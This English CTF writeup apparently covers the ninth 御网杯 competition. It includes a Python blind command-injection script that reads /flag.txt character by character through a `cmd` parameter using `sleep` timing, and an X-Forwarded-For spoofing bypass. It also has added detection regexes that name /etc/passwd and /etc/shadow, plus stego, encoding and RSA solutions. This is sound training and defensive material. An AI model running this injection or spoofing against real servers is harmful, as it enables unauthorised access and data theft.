2025 Ninth 御网杯 CTF Writeup (WP)

WEB

easyweb

I wrote a script to enumerate the flag file on the backend character by character and ran it. The first run only produced half of the flag: the closing `}` never came out and the tail was garbled. Thinking I only had half, I saved it for later. When I re-ran it at the end it would not finish at all and kept reporting network errors. I tried appending a closing brace myself, and that turned out to be correct. I wanted to run it one more time, but the output was garbled again.

```python
#!/usr/bin/env python3
import requests


def get_flag(addr, result=""):
    for x in range(1, 40):  # assume the flag is 39 characters long (positions 1 to 39)
        for i in range(0x20, 0x7f):  # printable ASCII range (32 to 126)
            if post(addr, x, chr(i)):
                result += chr(i)
                print(f"Current flag: {result}")  # print what has been recovered so far
                break  # character found, move on to the next position
    print(f"Final flag: {result}")  # print the final flag


def post(addr, pos, payload):
    data = {
        "cmd": f"[ $(cut -c {pos} /flag.txt 2>/dev/null) = '{payload}' ] && sleep 2"
    }
    try:
        requests.post(f"http://{addr}/", data, timeout=(3, 1))  # 3 s connect timeout, 1 s read timeout
        return False  # no timeout, so the character does not match
    except requests.exceptions.ReadTimeout:
        return True  # read timeout: the sleep fired, so the character matches
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
        return False


if __name__ == '__main__':
    get_flag("Here IP:port")
```
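The script only works because the `cmd` parameter reaches a shell with its operators intact and `sleep` can be used as a timing oracle. As an added example from the defender's side (not part of the original writeup), the following Python flags those indicators in URL-encoded request bodies and spots the consecutive `cut -c N` positions that a character-by-character extraction leaves behind. The sample bodies are constructed, and the function and pattern names are my own.

```python
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies, URL-encoded as a server or WAF would receive them.
SAMPLE_BODIES = [
    "cmd=ls+-la",
    "cmd=%5B+%24%28cut+-c+1+%2Fflag.txt+2%3E%2Fdev%2Fnull%29+%3D+%27f%27+%5D+%26%26+sleep+2",
    "cmd=cat+%2Fetc%2Fpasswd",
    "username=alice&password=hunter2",
]

# Shell control operators and command substitution: none of these belong in a
# parameter that is supposed to carry a single command or a plain argument.
SHELL_OPERATORS = re.compile(r"\$\(|`|&&|\|\||[;|&<>]")
# Commands whose only purpose inside a web request is to create a timing side channel.
TIMING_COMMANDS = re.compile(r"\b(sleep|timeout)\b")
# Paths a web application has no business reading.
SENSITIVE_PATHS = re.compile(r"/flag|/etc/passwd|/etc/shadow|/proc/")
# Position argument of `cut -c N`: a run of consecutive N from one client is the
# fingerprint of byte-by-byte extraction.
CUT_POSITION = re.compile(r"\bcut\s+-c\s+(\d+)\b")


def inspect_body(body: str) -> list:
    """Return the indicator names found in the cmd parameter of one request body."""
    hits = []
    for value in parse_qs(body, keep_blank_values=True).get("cmd", []):
        if SHELL_OPERATORS.search(value):
            hits.append("shell-operator")
        if TIMING_COMMANDS.search(value):
            hits.append("timing-command")
        if SENSITIVE_PATHS.search(value):
            hits.append("sensitive-path")
    return hits


def probed_positions(bodies) -> list:
    """Sorted distinct positions probed with `cut -c N` across a batch of bodies."""
    positions = set()
    for body in bodies:
        for value in parse_qs(body).get("cmd", []):
            for m in CUT_POSITION.finditer(value):
                positions.add(int(m.group(1)))
    return sorted(positions)


def looks_like_enumeration(bodies, min_run: int = 3) -> bool:
    """True when at least min_run consecutive positions were probed."""
    pos = probed_positions(bodies)
    run = 1
    for a, b in zip(pos, pos[1:]):
        run = run + 1 if b == a + 1 else 1
        if run >= min_run:
            return True
    return False


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(body[:40], "->", inspect_body(body) or "clean")
    print("enumeration pattern:", looks_like_enumeration(SAMPLE_BODIES))
```

The decoding step matters: the indicators only become visible after `parse_qs` has undone the percent-encoding, which is also why a filter that inspects the raw body misses them.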

YWB_Web_xff

Challenge description: read the source, bypass the IP restriction and get the flag.

Download the source and inspect it.
```php
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>企业门户登录系统</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="background"></div>
    <div class="container">
        <div class="header">
            <h1>企业门户登录系统</h1>
            <p>欢迎使用企业门户系统</p>
        </div>
        <div class="content">
            <form class="login-form" method="post" action="">
                <div class="form-group">
                    <label for="username">用户名</label>
                    <input type="text" id="username" name="username" required>
                </div>
                <div class="form-group">
                    <label for="password">密码</label>
                    <input type="password" id="password" name="password" required>
                </div>
                <button type="submit" class="login-btn">登录</button>
            </form>
            <?php
            if ($_SERVER["REQUEST_METHOD"] == "POST") {
                $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
                if ($cip == "2.2.2.1") {
                    echo '<div class="success">';
                    echo '<h2>登录成功!</h2>';
                    $flag = file_get_contents('/flag.txt');
                    echo '<p>flag{' . htmlspecialchars($flag) . '}</p>';
                    echo '</div>';
                } else {
                    echo '<div class="error">';
                    echo '<h2>登录失败</h2>';
                    echo '<p>IP地址验证失败</p>';
                    echo '<p>当前IP: ' . htmlspecialchars($cip) . '</p>';
                    echo '</div>';
                }
            }
            ?>
        </div>
        <div class="footer">
            <p>© 2024 企业门户系统 | 技术支持</p>
        </div>
    </div>
</body>
</html>
```

So it needs a POST request with a forged client IP: the check reads `$_SERVER["HTTP_X_FORWARDED_FOR"]`, which is whatever the client sends in the `X-Forwarded-For` header.

Capture the request in Burp Suite, add the header `X-Forwarded-For: 2.2.2.1`, and the flag comes back.
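The bug is that the page trusts `X-Forwarded-For` outright, and the header is entirely under the sender's control. As an added example (not part of the original writeup, and not the challenge's code), here is how a proxy-aware application should derive the client address in Python: the header is only honoured when the TCP peer (`$_SERVER["REMOTE_ADDR"]` in PHP) is one of our own proxies, and it is then walked from the right so that anything the client injected is never reached. The function names, the `TARGET` constant and the proxy ranges are my assumptions.

```python
import ipaddress

TARGET = "2.2.2.1"  # the address the challenge's PHP compares against


def client_ip(remote_addr: str, xff_header, trusted_proxies) -> str:
    """Client address derived the way a reverse-proxy-aware application should.

    remote_addr is the TCP peer, which the client cannot forge. X-Forwarded-For
    is only used when that peer is a trusted proxy; it is then walked from the
    right, skipping every hop that is itself a trusted proxy, and the first hop
    that is not one is the client. Values the client put into the header itself
    sit to the left of the address our proxy appended, so they are never reached.
    """
    trusted = [ipaddress.ip_network(p, strict=False) for p in trusted_proxies]

    def is_trusted(ip):
        return any(ip in net for net in trusted)

    peer = ipaddress.ip_address(remote_addr)
    if not xff_header or not is_trusted(peer):
        return str(peer)  # a header from an untrusted peer carries no information
    for hop in reversed(xff_header.split(",")):
        try:
            ip = ipaddress.ip_address(hop.strip())
        except ValueError:
            return str(peer)  # malformed hop: fall back to the unforgeable peer
        if not is_trusted(ip):
            return str(ip)
    return str(peer)  # only our own proxies appear in the chain


def ip_check_passes(remote_addr: str, xff_header, trusted_proxies) -> bool:
    """The challenge's comparison, done against the derived address instead of the raw header."""
    return client_ip(remote_addr, xff_header, trusted_proxies) == TARGET


if __name__ == "__main__":
    # Direct connection, spoofed header: the header is ignored.
    print(client_ip("198.51.100.9", "2.2.2.1", []))
    # Behind a trusted proxy that appended the real client after the spoofed value.
    print(client_ip("10.0.0.1", "2.2.2.1, 198.51.100.9", ["10.0.0.0/24"]))
```

With no trusted proxies configured the header is ignored completely, which is the correct default for an application that is not actually behind a proxy.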

MISC

光隙中的寄生密钥

We get a PNG image; run `strings` on it and look for keywords.

There is a file hidden inside, so use Kali's built-in foremost to carve it out.

That gives an encrypted zip archive.

Brute-forcing the zip password with ARCHPR gives the password 9864.

Open the text file inside and decode the hex string it contains:

5a6d78685a337337656b7368646a52534a546c59633042584d32556a66513d3d

The result, **ZmxhZ3s3ekshdjRSJTlYc0BXM2UjfQ==**, is base64; decoding it once more gives the final flag.

被折叠的显影图纸

The archive contains an xls file.

It asks for a password when opened.

But the spreadsheet itself is irrelevant; this is a steganography challenge.

As usual, drop it into Kali and enumerate with `strings`.

Unexpectedly, the flag is right there in the output.

草甸方阵的密语

Opening the file we find something in a flag-like format:

```
k9qrfSl6{uOV78pW32iXQ}
```

The 随波逐流 tool identifies it as a rail fence (栅栏) cipher.

Enumerate it with a script: undo the rail fence, then brute-force the Caesar shift.

```python
def rail_fence_decrypt(ciphertext, rails):
    # Build the rails. Note that this writes the input along the zigzag and reads
    # it back row by row, which is the encryption direction of the classic rail
    # fence; for this challenge (two groups) that is exactly the transform that
    # undoes the encoding.
    fence = [[] for _ in range(rails)]
    rail = 0
    direction = 1  # 1 means moving down, -1 means moving up

    for char in ciphertext:
        fence[rail].append(char)
        rail += direction
        if rail == rails - 1 or rail == 0:
            direction *= -1

    # Merge the rails
    plaintext = []
    for rail in fence:
        plaintext.extend(rail)
    return ''.join(plaintext)


def caesar_decrypt(ciphertext, shift):
    plaintext = []
    for char in ciphertext:
        if char.isalpha():
            shifted = ord(char) - shift
            if char.islower():
                if shifted < ord('a'):
                    shifted += 26
                elif shifted > ord('z'):
                    shifted -= 26
            elif char.isupper():
                if shifted < ord('A'):
                    shifted += 26
                elif shifted > ord('Z'):
                    shifted -= 26
            plaintext.append(chr(shifted))
        else:
            plaintext.append(char)
    return ''.join(plaintext)


def brute_force_decrypt(ciphertext):
    # Try rail fence (2 to 5 rails)
    for rails in range(2, 6):
        rail_decrypted = rail_fence_decrypt(ciphertext, rails)
        # Try Caesar (shifts 1 to 25)
        for shift in range(1, 26):
            caesar_decrypted = caesar_decrypt(rail_decrypted, shift)
            if 'flag' in caesar_decrypted.lower():
                print(f"栅栏轨道数: {rails}, 凯撒移位: {shift}")
                print(f"可能的结果: {caesar_decrypted}")


# Input ciphertext
ciphertext = "k9qrfSl6{uOV78pW32iXQ}"
brute_force_decrypt(ciphertext)
```

We get the flag.

If the brute force finds nothing, enumerate the rail counts by hand and then look at the Caesar offset.
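Two different ciphers go by the name 栅栏 (rail fence): the classic zigzag over N rails, and the grouped variant most Chinese CTF tools implement, which cuts the text into groups and reads it column by column. The script above applies the zigzag in its encryption direction, which happens to undo the grouped variant for two groups. As an added example that generalizes the writeup's approach (my own code, not from the original post), the following Python implements the true zigzag inverse, the grouped transform, and a solver that tries both before brute-forcing the Caesar shift; the function names and the `needle` parameter are mine.

```python
def rail_fence_decrypt(ciphertext: str, rails: int) -> str:
    """True inverse of the classic zigzag rail fence (plaintext written in a
    zigzag over `rails` rows, ciphertext read row by row)."""
    pattern, rail, step = [], 0, 1
    for _ in range(len(ciphertext)):  # which rail each plaintext position lands on
        pattern.append(rail)
        if rails > 1:
            if rail == 0:
                step = 1
            elif rail == rails - 1:
                step = -1
            rail += step
    rows, start = [], 0
    for r in range(rails):  # slice the ciphertext into its rows
        count = pattern.count(r)
        rows.append(list(ciphertext[start:start + count]))
        start += count
    return "".join(rows[r].pop(0) for r in pattern)


def grouped_fence(text: str, group: int) -> str:
    """The grouped 'fence' of Chinese CTF tools: cut the text into groups of
    `group` characters and read column by column. Applying it with group size g
    is undone by applying it with size len(text) // g, so the same function
    both encodes and decodes."""
    groups = [text[i:i + group] for i in range(0, len(text), group)]
    return "".join(g[j] for j in range(group) for g in groups if j < len(g))


def caesar_decrypt(text: str, shift: int) -> str:
    out = []
    for c in text:
        if c.isalpha():
            base = ord("A") if c.isupper() else ord("a")
            out.append(chr((ord(c) - base - shift) % 26 + base))
        else:
            out.append(c)
    return "".join(out)


def solve(ciphertext: str, needle: str = "flag{") -> list:
    """Try both fence variants, then every Caesar shift; return every candidate
    containing `needle` as (variant, parameter, shift, plaintext)."""
    stages = [("zigzag", r, rail_fence_decrypt(ciphertext, r)) for r in range(2, 8)]
    stages += [("grouped", g, grouped_fence(ciphertext, g))
               for g in range(2, len(ciphertext)) if len(ciphertext) % g == 0]
    hits = []
    for variant, param, stage in stages:
        for shift in range(26):
            plain = caesar_decrypt(stage, shift)
            if needle in plain:
                hits.append((variant, param, shift, plain))
    return hits


if __name__ == "__main__":
    for hit in solve("k9qrfSl6{uOV78pW32iXQ}"):
        print(hit)
```

The grouped transform is only tried for group sizes that divide the length; that is the case the writeup's ciphertext falls into, and it is why the two-rail zigzag in the encryption direction also worked there.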

ez_xor

Judging by the title and the content, this is an XOR encryption challenge.

What we know: the data is XOR-encrypted, but the key is unknown.

Write a script that strips the separators and tries every byte from 0x00 to 0xff as the key.

The following Python script recovers the flag:

```python
cipher_hex = "5f-55-58-5e-42-71-7a-6d-7f-48-4e-5c-78-6a-7d-08-00-08-44"
cipher_bytes = bytes.fromhex(cipher_hex.replace('-', ''))  # hex string to bytes

for key in range(0x100):  # try every key from 0x00 to 0xff
    plain = bytes([b ^ key for b in cipher_bytes]).decode('ascii', errors='ignore')
    if 'flag' in plain or 'FLAG' in plain:  # assume the flag format contains this word
        print(f"Key=0x{key:02x}: {plain}")
```

easy_misc

Opening the file we see a pile of decimal numbers; decoding them in 随波逐流 gives base64.

Then base64 decode -> base58 decode -> ROT gives the flag.
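Both this challenge and 光隙中的寄生密钥 above are chains of textbook encodings (decimal bytes, hex, base64, base58, ROT) peeled one layer at a time. As an added example (my own code, not from the writeup and not the tool the author used), the following Python automates that peeling: each layer is a decoder that only succeeds when its output is printable text, and a depth-first search over the layers stops when `flag{` appears. The layer and function names are mine, and `build_sample` constructs a three-layer test input that is not from the challenge.

```python
import base64
import binascii
import re

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58decode(s: str) -> bytes:
    n = 0
    for ch in s:
        n = n * 58 + B58_ALPHABET.index(ch)  # ValueError on a non-base58 character
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    zeros = len(s) - len(s.lstrip("1"))  # each leading '1' encodes a zero byte
    return b"\x00" * zeros + body


def b58encode(b: bytes) -> str:
    n, out = int.from_bytes(b, "big"), ""
    while n:
        n, r = divmod(n, 58)
        out = B58_ALPHABET[r] + out
    return "1" * (len(b) - len(b.lstrip(b"\x00"))) + out


def rot(text: str, shift: int) -> str:
    out = []
    for c in text:
        if c.isalpha():
            base = ord("A") if c.isupper() else ord("a")
            out.append(chr((ord(c) - base + shift) % 26 + base))
        else:
            out.append(c)
    return "".join(out)


def printable(b: bytes):
    """The decoded text if it is printable ASCII, else None (the layer failed)."""
    try:
        t = b.decode("ascii")
    except UnicodeDecodeError:
        return None
    return t if t and all(c.isprintable() or c in "\r\n\t" for c in t) else None


def layer_decimal(t):  # whitespace/comma separated byte values
    parts = re.split(r"[\s,]+", t.strip())
    if len(parts) < 2 or not all(p.isdigit() and int(p) < 256 for p in parts):
        return None
    return printable(bytes(int(p) for p in parts))


def layer_hex(t):
    t = t.strip()
    if len(t) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", t):
        return None
    return printable(bytes.fromhex(t))


def layer_base64(t):
    t = t.strip()
    if len(t) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", t):
        return None
    try:
        return printable(base64.b64decode(t, validate=True))
    except binascii.Error:
        return None


def layer_base58(t):
    t = t.strip()
    if not t or any(c not in B58_ALPHABET for c in t):
        return None
    return printable(b58decode(t))


def layer_rot(t):  # ROT-n is only accepted when some shift exposes the flag marker
    for shift in range(1, 26):
        out = rot(t, shift)
        if "flag{" in out:
            return out
    return None


LAYERS = [("decimal", layer_decimal), ("hex", layer_hex), ("base64", layer_base64),
          ("base58", layer_base58), ("rot", layer_rot)]


def peel(text: str, max_depth: int = 6, path=()):
    """Depth-first search over the decoders; returns (layer names, plaintext) or None."""
    if "flag{" in text:
        return path, text
    if max_depth == 0:
        return None
    for name, fn in LAYERS:
        out = fn(text)
        if out and out != text:
            found = peel(out, max_depth - 1, path + (name,))
            if found:
                return found
    return None


def build_sample() -> str:
    """Constructed three-layer input (not from the writeup): ROT13, base58, decimal bytes."""
    inner = b58encode(rot("flag{nested}", 13).encode())
    return " ".join(str(x) for x in inner.encode())
```

Running `peel` on the hex string from 光隙中的寄生密钥 reports the path `('hex', 'base64')`, and on the base64 string from the same challenge just `('base64',)`; a wrong guess at any layer backtracks instead of stopping the search.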

套娃

The archive contains a txt file.

Parsing it with `strings` shows that it probably contains other files.

Carve it with foremost; that produces a zip, and inside the zip is a .txt file that is also named 套娃.txt.

Going by the hint in the title, 套娃 (nesting dolls), the file probably contains yet another file, so run foremost again. This time a docx comes out; copy it to the host machine, open it, change the font colour, and the flag appears.

Another approach is to keep renaming the extension to zip and unzipping repeatedly; eventually an xml file comes out, and the flag is in there.
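The `strings` / foremost routine used in this challenge and in 光隙中的寄生密钥 comes down to two things: looking for printable runs, and looking for the magic bytes of known containers at arbitrary offsets. As an added example (my own code, not from the writeup and not foremost itself), here is a small Python version of both, plus a crude carver that splits at every signature; the `SAMPLE` bytes are constructed and are neither a real image nor a real archive.

```python
import re

# Magic bytes of the container formats that show up in challenges like these.
SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"PK\x03\x04": "zip",  # also docx/xlsx/pptx, which are zip containers
    b"%PDF-": "pdf",
    b"Rar!\x1a\x07": "rar",
    b"\xff\xd8\xff": "jpeg",
    b"GIF8": "gif",
}


def find_embedded(data: bytes) -> list:
    """Every (offset, type) where a known signature occurs, sorted by offset.
    A zip yields one hit per local file header, not one per archive."""
    hits = []
    for magic, name in SIGNATURES.items():
        pos = data.find(magic)
        while pos != -1:
            hits.append((pos, name))
            pos = data.find(magic, pos + 1)
    return sorted(hits)


def strings(data: bytes, min_len: int = 4) -> list:
    """Printable ASCII runs of at least min_len bytes, like the Unix strings tool."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def carve(data: bytes) -> list:
    """Split the data at every signature, the way a naive carver does it:
    each piece runs from its signature to the next signature or to EOF."""
    hits = find_embedded(data)
    pieces = []
    for i, (offset, name) in enumerate(hits):
        end = hits[i + 1][0] if i + 1 < len(hits) else len(data)
        pieces.append((name, data[offset:end]))
    return pieces


# Constructed sample: a PNG-like header, padding, an IEND marker, then a zip
# local file header naming secret.txt. Not a real image or archive.
SAMPLE = (b"\x89PNG\r\n\x1a\n" + b"\x00" * 20 + b"IEND\xaeB`\x82"
          + b"PK\x03\x04" + b"\x14\x00" + b"secret.txt" + b"\x00" * 8)

if __name__ == "__main__":
    print(find_embedded(SAMPLE))
    print(strings(SAMPLE))
    print([(name, len(piece)) for name, piece in carve(SAMPLE)])
```

Real carvers additionally parse the container's own length fields (the central directory for zip, the IEND chunk for PNG) to find the true end of each piece; splitting at the next signature, as here, over-reads when one file is nested inside another.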

CRYPTO

签到题 (warm-up)

We get an exe; opening it in Notepad reveals a base64 string. Decode it with any decoder to get the flag.

baby_rsa

Write a Python script:

```python
from Crypto.Util.number import long_to_bytes
import gmpy2

N = 12194420073815392880989031611545296854145241675320130314821394843436947373331080911787176737202940676809674543138807024739454432089096794532016797246441325729856528664071322968428804098069997196490382286126389331179054971927655320978298979794245379000336635795490242027519669217784433367021578247340154647762800402140321022659272383087544476178802025951768015423972182045405466448431557625201012332239774962902750073900383993300146193300485117217319794356652729502100167668439007925004769118070105324664379141623816256895933959211381114172778535296409639317535751005960540737044457986793503218555306862743329296169569
e = 65537
c = 4504811333111877209539001665516391567038109992884271089537302226304395434343112574404626060854962818378560852067621253927330725244984869198505556722509058098660083054715146670767687120587049288861063202617507262871279819211231233198070574538845161629806932541832207041112786336441975087351873537350203469642198999219863581040927505152110051313011073115724502567261524181865883874517555848163026240201856207626237859665607255740790404039098444452158216907752375078054615802613066229766343714317550472079224694798552886759103668349270682843916307652213810947814618810706997339302734827571635179684652559512873381672063


# Step 1: Factorize N (since p ≈ q, we can use Fermat's factorization)
def fermat_factorization(N):
    a = gmpy2.isqrt(N) + 1
    b2 = a * a - N
    while not gmpy2.is_square(b2):
        a += 1
        b2 = a * a - N
    b = gmpy2.isqrt(b2)
    p = a + b
    q = a - b
    return int(p), int(q)


p, q = fermat_factorization(N)
print(f"p = {p}")
print(f"q = {q}")

# Step 2: Compute phi(N) and d
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)

# Step 3: Decrypt ciphertext
m = pow(c, d, N)
flag = long_to_bytes(m).decode()
print(f"Flag: {flag}")
```
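The script works because Fermat's method needs roughly (p + q)/2 - sqrt(N) iterations, which is negligible when p and q share their top bits and hopeless otherwise. As an added example (my own code, not the writeup's script) the following standard-library Python makes that budget explicit, so the same function doubles as a key-generation sanity check, and carries the factorization through to decryption. The toy moduli built from 10007, 10009 and 65537 are constructed, not the challenge's; the function names are mine.

```python
from math import isqrt


def fermat_factor(n: int, max_steps: int = 100_000):
    """Fermat's method: from a = ceil(sqrt(n)) upwards, look for a^2 - n = b^2,
    which gives n = (a - b)(a + b). Returns (p, q, steps) with p >= q, or None
    when the step budget is exhausted (factors too far apart)."""
    a = isqrt(n)
    if a * a < n:
        a += 1
    for steps in range(max_steps):
        b2 = a * a - n
        b = isqrt(b2)
        if b * b == b2:
            return a + b, a - b, steps
        a += 1
    return None


def rsa_private_exponent(p: int, q: int, e: int = 65537) -> int:
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)  # modular inverse, Python 3.8+


def recover_plaintext(n: int, e: int, c: int, max_steps: int = 100_000):
    """The writeup's pipeline end to end: factor, derive d, decrypt. None if Fermat gives up."""
    found = fermat_factor(n, max_steps)
    if found is None:
        return None
    p, q, _ = found
    return pow(c, rsa_private_exponent(p, q, e), n)


def primes_too_close(p: int, q: int, budget: int = 1000) -> bool:
    """Key-generation check: reject a prime pair if Fermat recovers it within `budget` steps."""
    return fermat_factor(p * q, budget) is not None


if __name__ == "__main__":
    # Constructed toy keys (not the challenge's).
    close_n = 10007 * 10009       # adjacent primes: one step
    far_n = 10007 * 65537         # far apart: thousands of steps
    print(fermat_factor(close_n))
    print(fermat_factor(far_n, 1000), fermat_factor(far_n))
    c = pow(123456, 65537, close_n)
    print(recover_plaintext(close_n, 65537, c))
```

The same budget idea applies to the challenge modulus: the writeup's loop terminates almost immediately precisely because the generator picked p and q next to each other, and a generator that ran `primes_too_close` before emitting a key would have refused that pair.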

Cry_rsa

Write a script to compute the flag value:

```python
import math


def extended_gcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = extended_gcd(b % a, a)
        return (g, x - (b // a) * y, y)


def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    if g != 1:
        return None  # the modular inverse does not exist
    else:
        return x % m


# Given parameters
p = 473398607161
q = 4511491
e = 19

# Compute n and phi(n)
n = p * q
phi_n = (p - 1) * (q - 1)

# Compute d
d = modinv(e, phi_n)

# Compute the flag value
flag_value = d + 5

# Print the result
print(f"d = {d}")
print(f"flag{{{flag_value}}}")
```

ez_base

```text
Dear Friend ; Especially for you - this amazing announcement 
. This is a one time mailing there is no need to request
removal if you won't want any more ! This mail is being
sent in compliance with Senate bill 2316 , Title 1
; Section 303 ! This is not a get rich scheme . Why
work for somebody else when you can become rich in
77 months . Have you ever noticed society seems to
be moving faster and faster and more people than ever
are surfing the web ! Well, now is your chance to capitalize
on this ! We will help you turn your business into
an E-BUSINESS and sell more . You can begin at absolutely
no cost to you . But don't believe us . Ms Ames who
resides in Indiana tried us and says "Now I'm rich,
Rich, RICH" . We are licensed to operate in all states
. If not for you then for your LOVED ONES - act now
! Sign up a friend and you'll get a discount of 30%
! Thank-you for your serious consideration of our offer
. Dear Internet user ; Your email address has been
submitted to us indicating your interest in our letter
! This is a one time mailing there is no need to request
removal if you won't want any more ! This mail is being
sent in compliance with Senate bill 1620 , Title 8
; Section 302 . THIS IS NOT MULTI-LEVEL MARKETING .
Why work for somebody else when you can become rich
inside 25 days . Have you ever noticed more people
than ever are surfing the web and people will do almost
anything to avoid mailing their bills ! Well, now is
your chance to capitalize on this ! We will help you
sell more plus process your orders within seconds .
You can begin at absolutely no cost to you . But don't
believe us . Prof Anderson of Hawaii tried us and says
"Now I'm rich many more things are possible" ! We are
a BBB member in good standing . Do not go to sleep
without ordering ! Sign up a friend and your friend
will be rich too . Thank-you for your serious consideration
of our offer ! Dear Friend , You made the right decision
when you signed up for our club ! If you no longer
wish to receive our publications simply reply with
a Subject: of "REMOVE" and you will immediately be
removed from our mailing list ! This mail is being
sent in compliance with Senate bill 2616 ; Title 5
; Section 304 . THIS IS NOT MULTI-LEVEL MARKETING !
Why work for somebody else when you can become rich
inside 53 weeks . Have you ever noticed people love
convenience & nearly every commercial on television
has a .com on in it ! Well, now is your chance to capitalize
on this . We will help you increase customer response
by 160% and deliver goods right to the customer's doorstep
! You can begin at absolutely no cost to you ! But
don't believe us . Mr Jones of California tried us
and says "My only problem now is where to park all
my cars" ! We are licensed to operate in all states
. We implore you - act now ! Sign up a friend and you
get half off . Thanks .
```

This challenge hides the message inside spam-looking text (the spammimic encoding); just decode it on the website:
spammimic - decode

After decoding, base64-decode the result and the flag appears.